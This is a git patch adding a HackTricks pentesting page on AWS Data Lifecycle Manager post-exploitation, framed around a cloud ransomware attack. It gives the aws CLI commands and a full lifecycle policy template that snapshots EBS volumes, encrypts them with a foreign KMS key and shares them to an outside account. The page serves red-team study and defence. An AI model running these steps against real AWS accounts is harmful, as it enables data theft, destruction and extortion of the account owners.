From 571dcb827574bff3b5868fc6525e5c5f591a35be Mon Sep 17 00:00:00 2001
From: BrandonLedyard <44955493+BrandonLedyard@users.noreply.github.com>
Date: Thu, 29 Feb 2024 15:51:15 -0500
Subject: [PATCH] Create aws-dlm-post-exploitation.md
PR for bonus points on ARTE exam. User BrandonLedyard (known on discord as RiderOfMooses).
---
.../aws-dlm-post-exploitation.md | 119 ++++++++++++++++++
1 file changed, 119 insertions(+)
create mode 100644 pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md
diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md
new file mode 100644
index 000000000..62a6ddb2c
--- /dev/null
+++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -0,0 +1,119 @@
+# AWS - Data Lifecycle Manager
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Data Lifecycle Manger (DLM)
+
+### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
+
+A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+
+Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+
+```aws ec2 describe-volumes```
+
+Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
+
+
+```bash
+aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
+```
+
+A template for the policy document can be seen here:
+```bash
+{
+ "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+ "ResourceTypes": [
+ "VOLUME"
+ ],
+ "TargetTags": [
+ {
+ "Key": "ExampleKey",
+ "Value": "ExampleValue"
+ }
+ ],
+ "Schedules": [
+ {
+ "Name": "DailySnapshots",
+ "CopyTags": true,
+ "TagsToAdd": [
+ {
+ "Key": "SnapshotCreator",
+ "Value": "DLM"
+ }
+ ],
+ "VariableTags": [
+ {
+ "Key": "CostCenter",
+ "Value": "Finance"
+ }
+ ],
+ "CreateRule": {
+ "Interval": 24,
+ "IntervalUnit": "HOURS",
+ "Times": [
+ "03:00"
+ ]
+ },
+ "RetainRule": {
+ "Count": 14
+ },
+ "FastRestoreRule": {
+ "Count": 2,
+ "Interval": 12,
+ "IntervalUnit": "HOURS"
+ },
+ "CrossRegionCopyRules": [
+ {
+ "TargetRegion": "us-west-2",
+ "Encrypted": true,
+ "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+ "CopyTags": true,
+ "RetainRule": {
+ "Interval": 1,
+ "IntervalUnit": "DAYS"
+ }
+ }
+ ],
+ "ShareRules": [
+ {
+ "TargetAccounts": [
+ "123456789012"
+ ],
+ "UnshareInterval": 30,
+ "UnshareIntervalUnit": "DAYS"
+ }
+ ]
+ }
+ ],
+ "Parameters": {
+ "ExcludeBootVolume": false
+ }
+}
+```
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+